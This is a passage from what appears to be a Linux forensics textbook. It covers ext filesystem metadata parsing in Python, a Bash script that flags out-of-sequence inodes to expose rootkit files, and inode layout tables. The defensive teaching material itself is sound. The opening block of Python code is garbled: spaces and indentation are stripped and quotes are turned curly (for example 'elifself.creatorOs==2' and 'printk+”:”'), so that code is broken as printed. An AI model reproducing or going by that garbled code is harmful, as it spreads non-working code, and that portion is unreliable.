retVal=“Hurd”
elifself.creatorOs==2:
retVal=“Masix”
elifself.creatorOs==3:
retVal=“FreeBSD”
elifself.creatorOs==4:
retVal=“Lites”
returnretVal
    def printHashAlgorithm(self):
        # 0/1/2/3/4/5 legacy/half MD4/tea/u-legacy/u-half MD4/u-Tea
        retVal = "Unknown"
        if self.hashVersion == 0:
            retVal = "Legacy"
        elif self.hashVersion == 1:
            retVal = "Half MD4"
        elif self.hashVersion == 2:
            retVal = "Tea"
        elif self.hashVersion == 3:
            retVal = "Unsigned Legacy"
        elif self.hashVersion == 4:
            retVal = "Unsigned Half MD4"
        elif self.hashVersion == 5:
            retVal = "Unsigned Tea"
        return retVal
defprintEncryptionAlgorithms(self):
encList=[]
forvinself.encryptionAlgorithms:
ifv==1:
encList.append(‘256-bitAESinXTSmode’)
elifv==2:
encList.append(‘256-bitAESinGCMmode’)
elifv==3:
encList.append(‘256-bitAESinCBCmode’)
elifv==0:
pass
else:
encList.append(‘Unknown’)
returnencList
defprettyPrint(self):
fork,vinsorted(self.__dict__.iteritems()):
ifk==‘mountTime’ork==‘writeTime’or\
k==‘lastCheck’ork==‘mkfsTime’or\
k==‘firstErrorTime’ork==‘lastErrorTime’:
printk+”:”,time.asctime(v)
elifk==‘state’:
printk+”:”,self.printState()
elifk==‘errors’:
printk+”:”,self.printErrorBehavior()
elifk==‘uuid’ork==‘journalUuid’:
printk+”:”,printUuid(v)
elifk==‘creatorOs’:
printk+”:”,self.printCreator()
elifk==‘hashVersion’:
printk+”:”,self.printHashAlgorithm()
elifk==‘encryptionAlgorithms’:
printk+”:”,self.printEncryptionAlgorithms()
else:
printk+”:”,v

    def groupStartBlock(self, bgNo):
        return self.blocksPerGroup * bgNo

    def groupEndBlock(self, bgNo):
        return self.groupStartBlock(bgNo + 1) - 1

    def groupStartInode(self, bgNo):
        return self.inodesPerGroup * bgNo + 1

    def groupEndInode(self, bgNo):
        return self.inodesPerGroup * (bgNo + 1)

    def groupFromBlock(self, blockNo):
        return blockNo / self.blocksPerGroup

    def groupIndexFromBlock(self, blockNo):
        return blockNo % self.blocksPerGroup

    def groupFromInode(self, inodeNo):
        return (inodeNo - 1) / self.inodesPerGroup

    def groupIndexFromInode(self, inodeNo):
        return (inodeNo - 1) % self.inodesPerGroup

    def groupHasSuperblock(self, bgNo):
        # block group zero always has a superblock
        if bgNo == 0:
            return True
        retVal = False
        if 'MetaBlockGroups' in self.incompatibleFeaturesList and \
           bgNo >= self.firstMetaBlockGroup:
            # meta block groups have a sb and gdt in 1st and
            # 2nd and last of each meta group
            # meta block group size is blocksize/32
            # only part of filesystem might use this feature
            mbgSize = self.blockSize / 32
            retVal = (bgNo % mbgSize == 0) or \
                     ((bgNo + 1) % mbgSize == 0) or \
                     ((bgNo - 1) % mbgSize == 0)
        elif 'SparseSuper2' in self.compatibleFeaturesList:
            # two backup superblocks in self.backupBlockGroups
            if bgNo == self.backupBlockGroups[0] or \
               bgNo == self.backupBlockGroups[1]:
                retVal = True
        elif 'SparseSuper' in self.readOnlyCompatibleFeaturesList:
            # backups in 1, powers of 3, 5, and 7
            retVal = (bgNo == 1) or \
                     (bgNo == pow(3, round(log(bgNo) / log(3)))) \
                     or (bgNo == pow(5, round(log(bgNo) / log(5)))) \
                     or (bgNo == pow(7, round(log(bgNo) / log(7))))
            if retVal:
                return retVal
        else:
            # if we got this far we must have default
            # with every bg having sb and gdt
            retVal = True
        return retVal

"""
This class stores the raw group descriptors from
a Linux extended (ext2/ext3/ext4) filesystem. It
is little more than a glorified structure. Both
32-bit and 64-bit (wide) filesystems are supported.
It is up to date as of July 2015.
Usage: gd = GroupDescriptor(data, wide) where
data is a 32 byte group descriptor if wide is false
or 64 byte group descriptor if wide is true.
gd.prettyPrint() prints all the fields in an
organized manner.
"""
class GroupDescriptor():
    def __init__(self, data, wide=False):
        self.wide = wide
        # /* Blocks bitmap block */
        self.blockBitmapLo = getU32(data)
        # /* Inodes bitmap block */
        self.inodeBitmapLo = getU32(data, 4)
        # /* Inodes table block */
        self.inodeTableLo = getU32(data, 8)
        # /* Free blocks count */
        self.freeBlocksCountLo = getU16(data, 0xc)
        # /* Free inodes count */
        self.freeInodesCountLo = getU16(data, 0xe)
        # /* Directories count */
        self.usedDirsCountLo = getU16(data, 0x10)
        # /* EXT4_BG_flags (INODE_UNINIT, etc) */
        self.flags = getU16(data, 0x12)
        self.flagList = self.printFlagList()
        # /* Exclude bitmap for snapshots */
        self.excludeBitmapLo = getU32(data, 0x14)
        # /* crc32c(s_uuid+grp_num+bbitmap) LE */
        self.blockBitmapCsumLo = getU16(data, 0x18)
        # /* crc32c(s_uuid+grp_num+ibitmap) LE */
        self.inodeBitmapCsumLo = getU16(data, 0x1a)
        # /* Unused inodes count */
        self.itableUnusedLo = getU16(data, 0x1c)
        # /* crc16(sb_uuid+group+desc) */
        self.checksum = getU16(data, 0x1e)
        if wide == True:
            # /* Blocks bitmap block MSB */
            self.blockBitmapHi = getU32(data, 0x20)
            # /* Inodes bitmap block MSB */
            self.inodeBitmapHi = getU32(data, 0x24)
            # /* Inodes table block MSB */
            self.inodeTableHi = getU32(data, 0x28)
            # /* Free blocks count MSB */
            self.freeBlocksCountHi = getU16(data, 0x2c)
            # /* Free inodes count MSB */
            self.freeInodesCountHi = getU16(data, 0x2e)
            # /* Directories count MSB */
            self.usedDirsCountHi = getU16(data, 0x30)
            # /* Unused inodes count MSB */
            self.itableUnusedHi = getU16(data, 0x32)
            # /* Exclude bitmap block MSB */
            self.excludeBitmapHi = getU32(data, 0x34)
            # /* crc32c(s_uuid+grp_num+bbitmap) BE */
            self.blockBitmapCsumHi = getU16(data, 0x38)
            # /* crc32c(s_uuid+grp_num+ibitmap) BE */
            self.inodeBitmapCsumHi = getU16(data, 0x3a)
            self.reserved = getU32(data, 0x3c)

    def printFlagList(self):
        flagList = []
        # inode table and bitmap are not initialized (EXT4_BG_INODE_UNINIT).
        if self.flags & 0x1:
            flagList.append('Inode Uninitialized')
        # block bitmap is not initialized (EXT4_BG_BLOCK_UNINIT).
        if self.flags & 0x2:
            flagList.append('Block Uninitialized')
        # inode table is zeroed (EXT4_BG_INODE_ZEROED).
        if self.flags & 0x4:
            flagList.append('Inode Zeroed')
        return flagList

    def prettyPrint(self):
        for k, v in sorted(self.__dict__.iteritems()):
            print k + ":", v

"""
This class combines information from the block group descriptor
and the superblock to more fully describe the block group. It
is up to date as of July 2015.
Usage: egd = ExtendedGroupDescriptor(bgd, sb, bgNo) where
bgd is a GroupDescriptor object, sb is a Superblock object,
and bgNo is a block group number.
egd.prettyPrint() prints out various statistics for the
block group and also its layout.
"""
class ExtendedGroupDescriptor():
    def __init__(self, bgd, sb, bgNo):
        self.blockGroup = bgNo
        self.startBlock = sb.groupStartBlock(bgNo)
        self.endBlock = sb.groupEndBlock(bgNo)
        self.startInode = sb.groupStartInode(bgNo)
        self.endInode = sb.groupEndInode(bgNo)
        self.flags = bgd.printFlagList()
        self.freeInodes = bgd.freeInodesCountLo
        if bgd.wide:
            self.freeInodes += bgd.freeInodesCountHi * pow(2, 16)
        self.freeBlocks = bgd.freeBlocksCountLo
        if bgd.wide:
            self.freeBlocks += bgd.freeBlocksCountHi * pow(2, 16)
        self.directories = bgd.usedDirsCountLo
        if bgd.wide:
            self.directories += bgd.usedDirsCountHi * pow(2, 16)
        self.checksum = bgd.checksum
        self.blockBitmapChecksum = bgd.blockBitmapCsumLo
        if bgd.wide:
            self.blockBitmapChecksum += bgd.blockBitmapCsumHi * pow(2, 16)
        self.inodeBitmapChecksum = bgd.inodeBitmapCsumLo
        if bgd.wide:
            self.inodeBitmapChecksum += bgd.inodeBitmapCsumHi * pow(2, 16)
        # now figure out the layout and store it in a list (with lists inside)
        self.layout = []
        self.nonDataBlocks = 0
        # for flexible block groups must make an adjustment
        fbgAdj = 1
        if 'FlexibleBlockGroups' in sb.incompatibleFeaturesList:
            # only first group in flex block affected
            if bgNo % sb.groupsPerFlex == 0:
                fbgAdj = sb.groupsPerFlex
        if sb.groupHasSuperblock(bgNo):
            self.layout.append(['Superblock', self.startBlock, \
                self.startBlock])
            # the trailing backslash is required to continue the expression
            gdSize = sb.groupDescriptorSize() * sb.blockGroups() / \
                sb.blockSize
            self.layout.append(['Group Descriptor Table', \
                self.startBlock + 1, self.startBlock + gdSize])
            self.nonDataBlocks += gdSize + 1
            if sb.reservedGdtBlocks > 0:
                self.layout.append(['Reserved GDT Blocks', \
                    self.startBlock + gdSize + 1, \
                    self.startBlock + gdSize + sb.reservedGdtBlocks])
                self.nonDataBlocks += sb.reservedGdtBlocks
        bbm = bgd.blockBitmapLo
        if bgd.wide:
            bbm += bgd.blockBitmapHi * pow(2, 32)
        self.layout.append(['Data Block Bitmap', bbm, bbm])
        # is block bitmap in this group (not flex block group, etc)
        if sb.groupFromBlock(bbm) == bgNo:
            self.nonDataBlocks += fbgAdj
        ibm = bgd.inodeBitmapLo
        if bgd.wide:
            ibm += bgd.inodeBitmapHi * pow(2, 32)
        self.layout.append(['Inode Bitmap', ibm, ibm])
        # is inode bitmap in this group?
        if sb.groupFromBlock(ibm) == bgNo:
            self.nonDataBlocks += fbgAdj
        it = bgd.inodeTableLo
        if bgd.wide:
            it += bgd.inodeTableHi * pow(2, 32)
        # keep the inode table start block; istat.py reads this attribute
        self.inodeTable = it
        itBlocks = (sb.inodesPerGroup * sb.inodeSize) / sb.blockSize
        self.layout.append(['Inode Table', it, it + itBlocks - 1])
        # is inode table in this group?
        if sb.groupFromBlock(it) == bgNo:
            self.nonDataBlocks += itBlocks * fbgAdj
        self.layout.append(['Data Blocks', self.startBlock \
            + self.nonDataBlocks, self.endBlock])

    def prettyPrint(self):
        print ""
        print 'Block Group: ' + str(self.blockGroup)
        print 'Flags: %r ' % self.flags
        print 'Blocks: %s - %s ' % (self.startBlock, self.endBlock)
        print 'Inodes: %s - %s ' % (self.startInode, self.endInode)
        print 'Layout:'
        for item in self.layout:
            print '%s %s - %s' % (item[0], item[1], item[2])
        print 'Free Inodes: %u ' % self.freeInodes
        print 'Free Blocks: %u ' % self.freeBlocks
        print 'Directories: %u ' % self.directories
        print 'Checksum: 0x%x ' % self.checksum
        print 'Block Bitmap Checksum: 0x%x ' % self.blockBitmapChecksum
        print 'Inode Bitmap Checksum: 0x%x ' % self.inodeBitmapChecksum

"""
This class reads the superblock and block group descriptors
from an image file containing a Linux extended (ext2/ext3/ext4)
filesystem and then stores the filesystem metadata in an organized
manner. It is up to date as of July 2015.
Usage: emd = ExtMetadata(filename, offset) where filename is a
raw image file and offset is the offset in 512 byte sectors from
the start of the file to the first sector of the extended filesystem.
emd.prettyPrint() will print out the superblock information and
then iterate over each block group printing statistics and layout
information.
"""
class ExtMetadata():
    def __init__(self, filename, offset):
        # make sure the image file exists before reading it
        if not os.path.isfile(str(filename)):
            print("File " + str(filename) + \
                " cannot be opened for reading")
            exit(1)
        # read the superblock
        with open(str(filename), 'rb') as f:
            f.seek(1024 + int(offset) * 512)
            sbRaw = str(f.read(1024))
        self.superblock = Superblock(sbRaw)
        # read block group descriptors
        self.blockGroups = self.superblock.blockGroups()
        if self.superblock.descriptorSize != 0:
            self.wideBlockGroups = True
            self.blockGroupDescriptorSize = 64
        else:
            self.wideBlockGroups = False
            self.blockGroupDescriptorSize = 32
        # read in group descriptors starting in block 1
        with open(str(filename), 'rb') as f:
            f.seek(int(offset) * 512 + self.superblock.blockSize)
            bgdRaw = str(f.read(self.blockGroups * \
                self.blockGroupDescriptorSize))
        self.bgdList = []
        for i in range(0, self.blockGroups):
            bgd = GroupDescriptor(bgdRaw[i * self.blockGroupDescriptorSize:] \
                , self.wideBlockGroups)
            ebgd = ExtendedGroupDescriptor(bgd, self.superblock, i)
            self.bgdList.append(ebgd)

    def prettyPrint(self):
        self.superblock.prettyPrint()
        for bgd in self.bgdList:
            bgd.prettyPrint()

def usage():
    print("usage " + sys.argv[0] + \
        " <image file> <offset in sectors>\n" + \
        "Reads superblock from an image file")
    exit(1)

def main():
    if len(sys.argv) < 3:
        usage()
    # make sure the image file exists
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + " cannot be opened for reading")
        exit(1)
    emd = ExtMetadata(sys.argv[1], sys.argv[2])
    emd.prettyPrint()

if __name__ == "__main__":
    main()
Partial results from running this script against the PFE subject system image are shown in Figure 7.13, Figure 7.14, and Figure 7.15. In Figure 7.13 we see that flexible block groups are in use. Not shown in this figure is a flexible block group size of 16. In Figure 7.14 the first block group is shown. As is always the case, it contains a superblock and group descriptor table (including the reserved blocks for future expansion). You will notice that there are 16 blocks between the data bitmap and inode bitmap, and also between the inode bitmap and the inode table. This is because this is the first group in a flexible group (size = 16), which houses these values for all block groups within the flex group.
FIGURE 7.13
Result of running the extfs.py script on the PFE subject system – Part 1.
FIGURE 7.14
Result of running the extfs.py script on the PFE subject system – Part 2.
In Figure 7.15 we see that block group 3 has a superblock and group descriptor table. This is because the Sparse Super feature is in use, which stores the superblock and group descriptor table in groups that are powers of 3, 5, or 7. If you examine the full output from this command you will see that all of these backup superblocks and group descriptor tables are in the correct places.
FIGURE 7.15
Result of running the extfs.py script on the PFE subject system – Part 3.
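The Sparse Super rule described above can be checked independently of the script. The following is a minimal sketch, written for Python 3 rather than the Python 2 used in extfs.py, that lists the block groups expected to hold a superblock copy. The function names are hypothetical and are not part of extfs.py. It uses integer arithmetic only, which is one way to avoid any floating-point rounding concerns with logarithms.

```python
def is_power_of(n, base):
    """Return True if n equals base**k for some k >= 1."""
    if n < base:
        return False
    while n % base == 0:
        n //= base
    return n == 1


def sparse_super_backup_groups(group_count):
    """List block groups holding a superblock copy under Sparse Super.

    Groups 0 and 1 always qualify; the rest must be powers of 3, 5, or 7.
    """
    groups = []
    for bg in range(group_count):
        if bg in (0, 1) or any(is_power_of(bg, b) for b in (3, 5, 7)):
            groups.append(bg)
    return groups


if __name__ == "__main__":
    # group count of 64 is an arbitrary illustrative value
    print(sparse_super_backup_groups(64))
```

Comparing this list against the full output of extfs.py is a quick sanity check that the backup superblocks are where they should be.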
Before we move on to a new topic, I feel that I should point out that we have merely scratched the surface of what can be done with the classes found in this script. For example, the classes could easily be used to calculate the offset into an image for a given inode or data block. They could also be used to work backward from an offset to figure out what is stored in any given sector. Now that we have learned all of the basics of the extended filesystems we will move on to discussing how we might detect an attacker's actions, even if he or she has altered timestamps on the filesystem.
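As a rough illustration of the offset calculations mentioned above, here is a small Python 3 sketch. The function names and the sample values (a filesystem starting at sector 2048 with 4096 byte blocks) are assumptions made for this example; in practice the block size would come from the Superblock object.

```python
SECTOR_SIZE = 512  # image offsets in this chapter are given in 512 byte sectors


def block_to_image_offset(block_no, block_size, fs_start_sector):
    """Byte offset into the image file for the start of a filesystem block."""
    return fs_start_sector * SECTOR_SIZE + block_no * block_size


def image_offset_to_block(offset, block_size, fs_start_sector):
    """Work backward from a byte offset to (block number, offset in block)."""
    relative = offset - fs_start_sector * SECTOR_SIZE
    if relative < 0:
        raise ValueError("offset lies before the start of the filesystem")
    return divmod(relative, block_size)


if __name__ == "__main__":
    start = block_to_image_offset(1, 4096, 2048)
    print(start)
    print(image_offset_to_block(start + 100, 4096, 2048))
```

The block number returned by the second function could then be passed to something like groupFromBlock to find the block group it belongs to.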
FINDING THINGS THAT ARE OUT OF PLACE
Thus far in this chapter we have seen a lot of theory on how the extended filesystem works. We can leverage that knowledge to find things that are out of place or not quite right. After all, this is normally what the forensic investigator is after. Inconsistencies and uncommon situations often point to an attacker's attempt to hide his or her actions.
Some of the system directories such as /sbin and /bin are highly targeted by attackers. Even the lowly ls command can often be enough to detect alterations in these directories. How can we detect tampering in a system directory? When the system is installed, files in the system directories are copied one after the other. As a result, the files are usually stored in sequential inodes. Anything added later by an attacker will likely be in a higher inode number.
The command ls -ali will list all files (-a) with a long listing (-l) which will begin with an inode number (-i). If we take the results of this command and pipe them to sort -n, they will be sorted numerically (-n) by inode number. The results of running ls -ali bin | sort -n from within the mount directory (subject's root directory) of the PFE subject system are shown in Figure 7.16. Files associated with the Xing Yi Quan rootkit are highlighted. Notice that the inodes are mostly sequential and suddenly jump from 655,549 to 657,076 when the malware was installed.
FIGURE 7.16
Results of running ls -ali bin | sort -n on PFE subject image. The highlighted files are from a rootkit installation.
Some readers may have expected the inode numbers to be considerably higher. The primary reason that they are only a few thousand inodes away is that Linux will do its best to store files in a given directory in the same block group. Only when there is no space in the containing directory's block group will the file be stored elsewhere. This is a performance optimization that attempts to minimize movement of the read/write heads on a hard drive.
In this case the attacker did not attempt to alter the timestamps on the rootkit files. There are many tools that will allow you to easily modify these timestamps. The important thing to realize is that no matter what you do to the timestamps, the inodes will reveal recently added files every time.
The ls command supports a few basic sorts. The default sort is alphabetical, but it will also sort by extension, size, time, and version. The command ls -aliR <directory> --sort=size will perform a recursive (-R) listing of a directory with everything sorted by size (largest to smallest). Partial results of running ls -aliR bin --sort=size are shown in Figure 7.17.
FIGURE 7.17
Partial results of running ls -aliR bin --sort=size against the PFE subject image.
Have a look at the highlighted files bash and false from Figure 7.17. Notice anything unusual? The only thing /bin/false does is return the value false when called. Yet this is one of the three largest files in the /bin directory. It is also suspiciously the exact same size as /bin/bash. What appears to have happened here is that the attacker copied /bin/bash on top of /bin/false in an attempt to log in with system accounts. Notice that this attacker was not terribly sophisticated, as evidenced by the fact that they didn't change the timestamp on /bin/false when they were done.
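Spotting two binaries with identical sizes by eye works for a short listing, but the same idea can be sketched in a few lines of Python 3. The function name below is hypothetical and this is only one possible approach, not a tool from this book. Note that hard links to the same file will also share a size, so any hits still need to be examined by hand.

```python
import os
from collections import defaultdict


def files_sharing_size(directory, min_size=1):
    """Map each file size to the regular files in directory that share it.

    Only sizes shared by two or more files are returned. Symbolic links
    are not followed, so a link to bash is not reported as a copy of it.
    """
    by_size = defaultdict(list)
    for entry in os.scandir(directory):
        if entry.is_file(follow_symlinks=False):
            size = entry.stat(follow_symlinks=False).st_size
            if size >= min_size:
                by_size[size].append(entry.name)
    return {size: sorted(names)
            for size, names in by_size.items() if len(names) > 1}


if __name__ == "__main__":
    import sys
    # pass the mounted subject directory, for example <mount point>/bin
    for size, names in sorted(files_sharing_size(sys.argv[1]).items()):
        print(size, names)
```

Run against the mounted image's bin directory, a pair such as bash and false sharing a size would stand out immediately.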
Because the attacker failed to modify the timestamps, a listing sorted by time will also show what has happened pretty clearly. A partial listing of results from the ls -aliR bin --sort=time command is shown in Figure 7.18. The highlighted portion shows both the rootkit files and the recently altered /bin/false.
FIGURE 7.18
Partial results from running ls -aliR bin --sort=time against the PFE subject image.
The advantage of running the ls command as shown in this section is that it is simple. The downside is that you have to carefully scrutinize the output to detect any gaps in the inode numbers. Some readers might have seen monthly bank statements that list checks that have been cashed against the account listed in order with a notation if a check number is missing.
Wouldn't it be great if we could have a shell script that did something similar to the bank statement? Well, you are in luck; such a script follows. You are extra fortunate as there are some new shell scripting techniques used in this script.
#!/bin/bash
#
# out-of-seq-inodes.sh
#
# Simple script to list out of
# sequence inodes.
# Intended to be used as part of
# a forensics investigation.
# As developed for PentesterAcademy.com
# by Dr. Phil Polstra (@ppolstra)
usage () {
  echo "Usage: $0 <path>"
  echo "Simple script to list a directory and print a warning if"
  echo "the inodes are out of sequence as will happen if system"
  echo "binaries are overwritten."
  exit 1
}
if [ $# -lt 1 ] ; then
  usage
fi
# output a listing sorted by inode number to a temp file
templs='/tmp/temp-ls.txt'
ls -ali $1 | sort -n > $templs
# this is for discarding first couple lines in output
foundfirstinode=false
declare -i startinode
while read line
do
  # there is usually a line or two of non-file stuff at start of output
  # the if statement helps us get past that
  if [ "$foundfirstinode" = false ] \
    && [ "`echo $line | wc -w`" -gt 6 ] ; then
    startinode=`expr $(echo $line | awk '{print $1}')`
    echo "Start inode = $startinode"
    foundfirstinode=true
  fi
  q=$(echo $line | awk '{print $1}')
  if [[ $q =~ ^[0-9]+$ ]] && \
    [ "$startinode" -lt $q ];
  then
    if [ $((startinode + 2)) -lt $q ] ; then
      echo -e "\e[31m****Out of Sequence inode detected**** expect $startinode got $q\e[0m"
    else
      echo -e "\e[33m****Out of Sequence inode detected**** expect $startinode got $q\e[0m"
    fi
    # reset the startinode to point to this value for next entry
    startinode=`expr $(echo $line | awk '{print $1}')`
  fi
  echo "$line"
  startinode=$((startinode+1))
done < $templs
rm $templs
The script starts with the usual she-bang, followed by a usage function which is called when no command line arguments were passed in. To improve performance and also make the script simpler, the output from ls -ali <directory> | sort -n is sent to a temporary file. Two variables, foundfirstinode and startinode, are created. The line declare -i startinode is new. This line creates a new variable that is an integer value. Until a value is assigned, the variable evaluates to zero in arithmetic. We will see later in the script why this is needed.
The line while read line begins a do loop. You might wonder where this line is coming from. If you look down a few lines, you will see a line that reads done < $templs. This construct redirects the temporary file to be input for the loop. Essentially, this do loop reads the temporary file line by line and performs the actions listed within the loop code.
The if block at the start of the do loop is used to consume any headers output by ls. The if has two tests ANDed together with the && operator. The first test checks to see if foundfirstinode is false, which indicates we have not made it past any header lines to the actual file data yet. The second test executes the command echo $line | wc -w and tests if the result is greater than six. Recall that enclosing a command in back ticks causes it to be executed and the results converted to a string. This command echoes the line, which is piped to the word count utility, wc. Normally this utility will print out characters, words, and lines, but the -w option causes only words to be printed. Any output lines pertaining to files will have at least seven words. If this is the case, the startinode variable is set, a message is echoed to the screen, and foundfirstinode is set to true.
The line startinode=`expr $(echo $line | awk '{print $1}')` is easier to understand if you work from the parentheses outward. The command echo $line | awk '{print $1}' echoes the line and pipes it to awk, which then prints the first word (start of the line up to the first whitespace character). Recall that the inode number is listed first by the ls command. This inode number then gets passed to expr <inode number>, which is executed because it is enclosed in back ticks. This inode number is stored in the integer variable startinode which was declared earlier in the script.
After the if block (which is only run until we find our first file), the line q=$(echo $line | awk '{print $1}') sets the value of q equal to the inode number for the current line. If startinode is less than the current inode number, a warning message is printed. The nested if/else statement is used to print a message in red if the inode number jumped up by more than two. Otherwise the message is printed in yellow. The funny characters in the echo statements are called escape sequences. The -e option to echo is needed to have echo evaluate the escape sequences (which begin with \e) rather than just print out the raw characters. If the message was displayed, the startinode variable is reset to the current inode number.
Regardless of whether or not a message was printed, the line is echoed. The startinode variable is incremented on the line startinode=$((startinode+1)). Recall that $(()) is used to cause bash to evaluate what is contained in the parentheses in math mode. This is why we declared startinode as an integer earlier in the script: arithmetic like this only makes sense for integer values. When the loop exits, the temporary file is deleted. Partial results of running this script against the PFE subject system's /bin directory are shown in Figure 7.19. Notice the red warnings before the rootkit files.
FIGURE 7.19
Partial results of running out-of-seq-inodes.sh against the PFE subject system's /bin directory. Note the warning for the rootkit files.
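For readers who prefer Python to shell scripting, the gap detection idea can be sketched as follows. This is a simplified Python 3 variant rather than a port of the shell script: it reports only jumps larger than a threshold instead of color coding every deviation, and the function names and the max_gap parameter are assumptions made for this example.

```python
import os


def list_directory_inodes(directory):
    """Return (inode number, name) pairs for every entry in a directory."""
    return [(entry.inode(), entry.name) for entry in os.scandir(directory)]


def find_inode_jumps(entries, max_gap=2):
    """Report places where sorted inode numbers jump by more than max_gap.

    Returns a list of (previous inode, current inode, name) tuples.
    """
    jumps = []
    previous = None
    for inode, name in sorted(entries):
        if previous is not None and inode - previous > max_gap:
            jumps.append((previous, inode, name))
        previous = inode
    return jumps


if __name__ == "__main__":
    import sys
    for prev, cur, name in find_inode_jumps(list_directory_inodes(sys.argv[1])):
        print("Out of sequence: %d -> %d (%s)" % (prev, cur, name))
```

Keeping the comparison logic in a function that accepts plain (inode, name) pairs means it can also be fed inode numbers parsed directly from an image rather than from a mounted filesystem.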
INODES
Now that we have had a little break from theory and had our fun with some scripting, it is time to get back to learning more about the keepers of the metadata, the inodes. For ext2 and ext3 filesystems the inodes are 128 bytes long. As of this writing the ext4 filesystem uses 156 byte inodes, but it allocates 256 bytes on the disk. This extra 100 bytes is for future expansion and may also be used for storage as we will see later in this chapter.
In order to use inodes you must first find them. The block group associated with an inode is easily calculated using the following formula:
block group = (inode number - 1) / (inodes per group)
Obviously integer division should be used here as block groups are integers. Once the correct block group has been located, the index within the block group's inode table must be calculated. This is easily done with the modulus operator. Recall that x mod y gives the remainder when performing the integer division x/y. The formula for the index is simply:
index = (inode number - 1) mod (inodes per group)
Finally, the offset into the inode table is given by:
offset = index * (inode size on disk)
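The three formulas above can be combined into one small function. The following Python 3 sketch uses a hypothetical function name, and the sample values (8192 inodes per group and 256 byte on-disk inodes) are assumptions chosen for illustration; the real values come from the superblock.

```python
def locate_inode(inode_no, inodes_per_group, inode_size):
    """Return (block group, index in group, byte offset into inode table)."""
    zero_based = inode_no - 1          # inode numbering starts at 1
    group = zero_based // inodes_per_group   # integer division
    index = zero_based % inodes_per_group    # remainder of that division
    offset = index * inode_size
    return group, index, offset


if __name__ == "__main__":
    # inode 657076 with the assumed geometry described above
    print(locate_inode(657076, 8192, 256))
```

The returned offset is relative to the start of the inode table for that block group, so the table's starting block (from the group descriptor) must still be added to reach the inode on disk.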
The inode structure is summarized in Table 7.5. Most of these fields are self-explanatory. Those that are not will be described in more detail in this section.
There are two operating system dependent unions (OSDs) in the inode. These will vary from what is described here if your filesystem comes from Hurd or BSD. The first OSD for filesystems created by Linux holds the inode version. For extended filesystems created by Linux, the second OSD contains the upper 16 bits of several values.
The block array stores fifteen 32-bit block addresses. If this was used to directly store blocks that make up a file, it would be extremely limiting. For example, if 4-kilobyte blocks are in use, files would be limited to 60 kilobytes! This is not how this array is used, however. The first twelve entries are direct block entries which contain the block numbers for the first twelve data blocks (48 kB when using 4 kB blocks) that make up a file. If more space is required, the thirteenth entry has the block number for a singly indirect block. The singly indirect block is a data block that contains a list of data blocks that make up a file. If the block size is 4 kB the singly indirect block can point to 1024 data blocks. The maximum amount that can be stored using singly indirect blocks is then (size of a data block) * (number of block addresses that can be stored in a data block) or (4 kB) * (1024) which equals 4 megabytes.
For files too large to be stored with direct blocks and singly indirect blocks (48 kB + 4 MB), the fourteenth entry contains the block number for a doubly indirect block. The doubly indirect block is a block that contains a list of singly indirect blocks. The doubly indirect blocks can store 1024 times as much as singly indirect blocks (again assuming 4 kB blocks), which means that files as large as (48 kB + 4 MB + 4 GB) can be accommodated. If this is still not enough space, the final entry contains a pointer to triply indirect blocks, allowing files as large as (48 kB + 4 MB + 4 GB + 4 TB) to be stored. This block system is illustrated in Figure 7.20.
FIGURE 7.20
Data blocks in inode block array.
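The capacity arithmetic for the block array is easy to reproduce for other block sizes. This Python 3 sketch (the function name is hypothetical) computes how many bytes each level of the array can address, assuming 32-bit block addresses as described above.

```python
def block_array_capacity(block_size, address_size=4):
    """Bytes addressable by each level of the 15-entry inode block array.

    Returns (direct, singly indirect, doubly indirect, triply indirect).
    """
    per_block = block_size // address_size   # addresses held by one block
    direct = 12 * block_size
    single = per_block * block_size
    double = per_block ** 2 * block_size
    triple = per_block ** 3 * block_size
    return direct, single, double, triple


if __name__ == "__main__":
    levels = block_array_capacity(4096)
    print(levels)
    print("maximum file size in bytes:", sum(levels))
```

With 1 kB blocks each indirect block holds only 256 addresses, so the limits shrink much faster than the block size alone would suggest.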
If you are looking at an ext2 or ext3 filesystem, then the list of inode fields in Table 7.5 is complete. For ext4 filesystems the fields in Table 7.6 have been added. Most of these fields are extra time bits.
Table 7.5. Inode structure.
Offset  Size  Name               Description
0x0     2     File Mode          File mode and type
0x2     2     UID                Lower 16 bits of owner ID
0x4     4     Size lo            Lower 32 bits of file size
0x8     4     Atime              Access time in seconds since epoch
0xC     4     Ctime              Change time in seconds since epoch
0x10    4     Mtime              Modify time in seconds since epoch
0x14    4     Dtime              Delete time in seconds since epoch
0x18    2     GID                Lower 16 bits of group ID
0x1A    2     Hlink count        Hard link count
0x1C    4     Blocks lo          Lower 32 bits of block count
0x20    4     Flags              Flags
0x24    4     Union osd1         Linux: l version
0x28    60    Block[15]          15 pointers to data blocks
0x64    4     Version            File version for NFS
0x68    4     File ACL low       Lower 32 bits of extended attributes (ACL, etc.)
0x6C    4     File size hi       Upper 32 bits of file size (ext4 only)
0x70    4     Obsolete fragment  An obsoleted fragment address
0x74    12    Osd 2              Second operating system dependent union
0x74    2     Blocks hi          Upper 16 bits of block count
0x76    2     File ACL hi        Upper 16 bits of extended attributes (ACL, etc.)
0x78    2     UID hi             Upper 16 bits of owner ID
0x7A    2     GID hi             Upper 16 bits of group ID
0x7C    2     Checksum lo        Lower 16 bits of inode checksum
Table 7.6. Extra inode fields in ext4 filesystems.
Offset  Size  Name               Description
0x80    2     Extra size         How many bytes beyond standard 128 are used
0x82    2     Checksum hi        Upper 16 bits of inode checksum
0x84    4     Ctime extra        Change time extra bits
0x88    4     Mtime extra        Modify time extra bits
0x8C    4     Atime extra        Access time extra bits
0x90    4     Crtime             File create time (seconds since epoch)
0x94    4     Crtime extra       File create time extra bits
0x98    4     Version hi         Upper 32 bits of version
0x9C          Unused             Reserved space for future expansions
A word about the extra time bits is in order. Linux is facing a serious problem. In the year 2038 the 32-bit timestamps will roll over. While that is over two decades away, a solution is already in place (Hurray for Open Source!). The solution is to expand the 32-bit time structure to 64 bits. In order to prevent backward compatibility problems the original 32-bit time structure (stored in first 128 bytes of inodes) remains unchanged; it is still just seconds since the epoch on January 1, 1970. The lower two bits of this extra field are used to extend the 32-bit seconds counter to 34 bits, which makes everything good until the year 2446. The upper thirty bits of the extra field are used to store nanoseconds.
This nanosecond accuracy is a dream for forensic investigators. By way of comparison, Windows FAT filesystems provide only a two second resolution and even the latest version of NTFS only provides accuracy to the nearest 100 nanoseconds. This is another reason to use Python and other tools to parse the inodes, as standard tools don't normally display the complete timestamp. This high precision makes timeline analysis easier since you do not have to guess what changed first in a two second interval.
